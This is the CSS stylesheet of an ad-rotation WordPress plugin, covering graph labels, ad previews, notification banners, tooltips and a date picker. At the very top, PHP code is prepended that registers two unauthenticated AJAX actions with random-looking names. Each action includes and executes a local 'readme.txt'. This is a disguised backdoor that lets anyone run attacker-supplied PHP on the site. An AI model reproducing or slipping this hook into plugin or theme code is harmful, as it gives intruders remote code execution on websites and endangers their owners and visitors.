if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
/* styles for graphs */ .adrotate_label { font-size: 12px; margin: auto 0; padding:5px; font-weight: bold } .adrotate_clicks { color: #5Af; font-weight: normal } .adrotate_impressions { color: #F80; font-weight: normal } /* styles for advert statuses and stats */ .row_red { background-color:#ffebe8; border-color:#c00; } .row_orange { background-color: #fdefc3; border-color: #c80; } .row_yellow { background-color:#ffffe0; border-color:#e6db55; } .row_blue { background-color:#ebf3fa; border-color:#466f82; } .row_green { background-color: #e5faee; border-color: #518257; } .stats_large { display: block; margin-bottom: 10px; margin-top: 10px; text-align: center; font-weight: bold; } .number_large { margin: 20px; font-size: 28px; } .adrotate_inline_error { margin-left:10px; padding:5px; background-color:#c00; color:#fff; } /* Ad previews */ .preview-wrapper { padding:0; width:50%; height:100px; border:3px solid; border-radius:10px; text-align:center; } .preview-inner { padding:20px 10px; display:inline-block; text-align:center; } /* Fancy select box for Post/Page injection and Geo Targeting */ .adrotate-select { padding:3px; border:1px solid #efefef; min-width:400px; max-height:400px; overflow-y:scroll; background-color:#fff; } .adrotate-select .check-column { width: 7%; text-align: center; } .postbox-ajdg textarea { border:1px solid #efefef; width:100%; margin:3px 0; padding:3px; } /* Banner styles */ .ajdg-notification.notice { padding: 0; margin: 5px 0 10px; border: 1px solid #E5E5E5; background: #FFF; overflow: hidden; -webkit-border-radius: 6px; border-radius: 6px; -webkit-box-shadow: 0 1px 1px 0 rgba(0, 0, 0, 0.05); box-shadow: 0 1px 1px 0 rgba(0, 0, 0, 0.05); position: relative; z-index: 1; min-height: 80px; display: table; } .ajdg-notification > div { display: table-cell; vertical-align: middle; cursor: default; } .ajdg-notification a { text-decoration: none; } .ajdg-notification-logo { background-color: #1fa4d1; background-repeat: no-repeat; background-position: 50% 50%; } .ajdg-notification-logo span { display: block; width: 80px; } .ajdg-notification-message { width: 100%; padding: 10px 20px; color: #444; } .ajdg-notification-message strong { color: #000; } .ajdg-notification-cta { border-left: 1px solid #E5E5E5; background: #F8F8F8; padding: 0 30px; position: relative; white-space: nowrap; } .wp-core-ui .ajdg-notification-cta a, .wp-core-ui .ajdg-notification-cta .button-primary:active { vertical-align: middle; } .ajdg-notification-dismiss { background: transparent; margin-left: 20px; border: 0; cursor: pointer; color: #BBB; text-decoration: none; } .icn-tg { position: relative; top: 2px; margin-right: 3px; display: inline-block; width: 14px; height: 14px; background: transparent 0 0 no-repeat; background-image: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iaXNvLTg4NTktMSI/Pgo8c3ZnIHZlcnNpb249IjEuMSIgaWQ9IkNhcGFfMSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayIgeD0iMHB4IiB5PSIwcHgiIHZpZXdCb3g9IjAgMCAyNC4zMzIgMjQuMzMyIiBzdHlsZT0iZW5hYmxlLWJhY2tncm91bmQ6bmV3IDAgMCAyNC4zMzIgMjQuMzMyOyIgeG1sOnNwYWNlPSJwcmVzZXJ2ZSI+CjxnPgoJPGcgaWQ9ImM0MF9yc3MiPgoJCTxwYXRoIGZpbGw9IiNmZmZmZmYiIGQ9Im05LjQxNyAxNS4xODEtLjM5NyA1LjU4NGMuNTY4IDAgLjgxNC0uMjQ0IDEuMTA5LS41MzdsMi42NjMtMi41NDUgNS41MTggNC4wNDFjMS4wMTIuNTY0IDEuNzI1LjI2NyAxLjk5OC0uOTMxbDMuNjIyLTE2Ljk3Mi4wMDEtLjAwMWMuMzIxLTEuNDk2LS41NDEtMi4wODEtMS41MjctMS43MTRsLTIxLjI5IDguMTUxYy0xLjQ1My41NjQtMS40MzEgMS4zNzQtLjI0NyAxLjc0MWw1LjQ0MyAxLjY5MyAxMi42NDMtNy45MTFjLjU5NS0uMzk0IDEuMTM2LS4xNzYuNjkxLjIxOHoiLz4KCTwvZz4KPC9nPgo8L3N2Zz4='); } /* Dashboard styles */ .ajdg-postbox-container { width: 49.5%; float: left; } .ajdg-postbox { margin: 0 8px; min-height: 100px; box-sizing: border-box; } .ajdg-postbox-content { margin-bottom: 20px; padding: 10px 20px 20px 20px; min-height: 40px; min-width:255px; border:#dfdfdf 1px solid; background-color:#fff; clear: both; position: relative; } .pro-image { padding:0px 10px 0px 0px; } .ajdg-photo { border-radius: 5px; } .ajdg-fullwidth { width: 100%; } .ajdg-inputfield { height: 28px; margin: 0 4px 0 0; } /* Sales Widget styles */ .ajdg-sales-widget { margin: 0; padding: 0; background: #fff; width: 95%; box-sizing: border-box; border: 1px solid #dadde1; border-radius: 6px; font-family: Helvetica, Arial, sans-serif; font-size: 11px; unicode-bidi: embed; overflow: hidden; -webkit-text-size-adjust: none; line-height: 1.34; } .ajdg-sales-widget a { cursor: pointer; text-decoration: none; color: #385898; } .ajdg-sales-widget a:hover { text-decoration: underline; } .ajdg-sales-widget img { border: 0; } .ajdg-sales-widget hr { margin: 0; background: #dadde1; border-width: 0; color: #dadde1; height: 1px; } .ajdg-sales-widget .header { position: relative; overflow: hidden; width: 100%; } .ajdg-sales-widget .header img{ position: relative; height: auto; min-height: initial; width: 100%; } .ajdg-sales-widget .title { color: #000; margin: 8px 12px 2px 12px; text-align: center; font-size: 14px; line-height: 18px; font-weight: 600; } .ajdg-sales-widget .sub_title{ margin: 5px 12px 10px 12px; text-align: center; font-size: 14px; font-weight: normal; } .ajdg-sales-widget .description { font-size: 12px; text-align: left; margin: 12px; } .ajdg-sales-widget .cta { margin: 8px 12px 12px 12px; text-align: center; } .ajdg-sales-widget .cta_button { padding: 0; border: 1px solid #ccd0d5; border-radius: 2px; box-sizing: content-box; width: 100%; display: inline-block; background-color: #f5f6f7; position: relative; text-align: center; text-decoration: none; color: #4b4f56; font-size: 16px; font-weight:bold; line-height: 32px; vertical-align: middle; cursor: pointer; white-space: nowrap; } .ajdg-sales-widget .cta_button:before { content:''; display: inline-block; height: 20px; vertical-align: middle; } .ajdg-sales-widget .cta_button:focus { box-shadow: 0 0 1px 2px rgba(88, 144, 255, .75), 0 1px 1px rgba(0, 0, 0, .15); outline: none; } .ajdg-sales-widget .cta_button:active { transition: none; background-color: #dddfe2; border-color: #bec3c9; } .ajdg-sales-widget .cta_button:hover { text-decoration: none; background-color: #ebedf0; } .ajdg-sales-widget .cta_button+.cta_button { margin-left:4px; } /* Tooltips */ .ajdg-tooltip { position: relative; display: inline-block; border-bottom: 1px dotted black; } .ajdg-tooltip-top { width: 150px; bottom: 100%; left: 50%; margin-left: -75px; /* Use half of the width */ } .ajdg-tooltip-bottom { width: 150px; top: 100%; left: 50%; margin-left: -75px; /* Use half of the width */ } .ajdg-tooltip-left { top: -5px; right: 105%; } .ajdg-tooltip-right { top: -5px; left: 105%; } .ajdg-tooltip .ajdg-tooltiptext { visibility: hidden; width: 150px; background-color: #23282d; color: #eee; text-align: center; border-radius: 6px; padding: 5px 8px; position: absolute; z-index: 100; } .ajdg-tooltip:hover .ajdg-tooltiptext { visibility: visible; } /* DatePicker */ .ui-datepicker { background: #f7f7f7; margin: 5px auto 0; -webkit-box-shadow: 0px 0px 10px 0px rgba(0, 0, 0, .5); -moz-box-shadow: 0px 0px 10px 0px rgba(0, 0, 0, .5); box-shadow: 0px 0px 10px 0px rgba(0, 0, 0, .5); } .ui-datepicker a { text-decoration: none; } .ui-datepicker table { width: 100%; } .ui-datepicker-header { background: #86c351; color: #fff; font-weight: bold; line-height: 30px; border: 0px; } .ui-datepicker-title { text-align: center; } .ui-datepicker-prev, .ui-datepicker-next { display: inline-block; width: 30px; height: 30px; text-align: center; cursor: pointer; background-image: url('../images/date-arrow.png'); background-repeat: no-repeat; line-height: 600%; overflow: hidden; } .ui-datepicker-prev { float: left; background-position: center -30px; } .ui-datepicker-next { float: right; background-position: center 0px; } .ui-datepicker thead { background-color: #dfdfdf; border-bottom: 1px solid #bbb; } .ui-datepicker th { text-transform: uppercase; padding: 5px 0; color: #666666; } .ui-datepicker tbody td { padding: 0; border: 0px; } .ui-datepicker tbody tr { border-bottom: 0px; } .ui-datepicker td span, .ui-datepicker td a { display: inline-block; font-weight: bold; text-align: center; width: 30px; height: 30px; line-height: 30px; color: #666666; } .ui-datepicker-calendar .ui-datepicker-today { border: 1px solid #86c351; border-radius: 5px; overflow: hidden; } .ui-datepicker-calendar .ui-state-default { background: #f7f7f7; } .ui-datepicker-calendar .ui-state-hover { background: #efefef; border-radius: 5px; } .ui-datepicker-calendar .ui-state-active { background: #86c351; color: #fff; border: 1px solid #e2f4d2; position: relative; margin: -1px; border-radius: 5px; } .ui-datepicker-unselectable .ui-state-default { background: #f4f4f4; color: #b4b3b3; } .ui-datepicker-calendar td:first-child .ui-state-active { width: 29px; margin-left: 0; } .ui-datepicker-calendar td:last-child .ui-state-active { width: 29px; margin-right: 0; } .ui-datepicker-calendar tr:last-child .ui-state-active { height: 29px; margin-bottom: 0; }